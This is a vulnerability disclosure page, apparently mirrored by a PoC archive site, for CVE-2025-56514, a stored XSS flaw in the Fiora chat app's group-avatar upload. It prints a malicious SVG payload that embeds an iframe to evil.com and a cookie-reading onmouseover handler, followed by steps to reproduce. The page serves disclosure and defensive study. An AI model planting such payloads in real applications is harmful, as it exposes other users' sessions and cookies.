Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-56514 PoC — Fiora 跨站脚本漏洞

Source
https://github.com/Kov404/CVE-2025-56514
Associated Vulnerability
Title:Fiora 跨站脚本漏洞 (CVE-2025-56514)
Description:Cross Site Scripting (XSS) vulnerability in Fiora chat application 1.0.0 allows executes arbitrary JavaScript when malicious SVG files are rendered by other users.
Description
Cross Site Scripting (XSS) Vulnerability in Fiora Chat Application
Readme
# CVE-2025-56514: Cross Site Scripting (XSS) Vulnerability in Fiora Chat Application

## Overview
A Cross Site Scripting (XSS) vulnerability, identified as **CVE-2025-56514**, affects the Fiora chat application version 1.0.0. This vulnerability allows an authenticated user to execute arbitrary JavaScript in the context of another user's browser by uploading a malicious SVG file through the group avatar change functionality.

## Vulnerability Details
- **Vulnerability Type**: Cross Site Scripting (XSS)
- **Attack Type**: Remote
- **Impact**: Code Execution
- **Affected Product Code Base**: Fiora 1.0.0
- **Vendor**: suisuijiang
- **Discoverer**: Kaio Mendonca Pereira

## Affected Components
The following components in the Fiora chat application are impacted:
- **Backend**: `packages/server/src/routes/group.ts` (group management routes)
- **Frontend**:
  - `packages/web/src/modules/Chat/GroupManagePanel.tsx` (group avatar upload interface)
  - `packages/web/src/service.ts` (API service layer)
  - `packages/web/src/components/Avatar.ts` (avatar rendering component)

## Attack Vectors
An authenticated user with creator privileges in a group can exploit this vulnerability by:
1. Uploading a malicious SVG file containing embedded JavaScript via the "Change Group Avatar" functionality.
2. The malicious SVG is stored in the `/GroupAvatar/` directory.
3. When the SVG avatar is rendered by the `Avatar.tsx` component in another user's browser, the embedded JavaScript executes, enabling XSS exploitation.

## Steps to Reproduce
1. **Authentication**: Log in to the Fiora chat application with valid credentials.
2. **Access Target Group**: Navigate to group management and select a group where you have creator privileges.
3. **Upload Malicious SVG**: Use the "Change Group Avatar" feature to upload a malicious SVG file with embedded JavaScript, such as:
   ```xml
   <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
       <foreignObject x="0" y="0" width="100" height="100">
           <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
       </foreignObject>
       <text x="0" y="15"></text>
   </svg>
File Snapshot

 [4.0K]  /data/pocs/eece55c9efba8c9322a2154328467897f2056076
└── [2.2K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →